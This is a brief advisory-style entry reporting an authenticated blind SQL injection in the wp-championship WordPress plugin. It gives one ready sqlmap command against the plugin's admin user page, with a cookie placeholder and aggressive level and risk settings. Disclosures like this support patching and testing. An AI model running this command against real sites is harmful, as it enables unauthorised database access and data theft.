The wp-championship WordPress plugin was affected by an Authenticated Blind SQL Injection security vulnerability.
$ sqlmap -u ‘http://www.example.com/wp-admin/wp-championship/cs_admin_users.php&userid;=’ --data=“isadmin=1&user;” --cookie=AUTH_COOKIE_HERE --level=5 --risk=3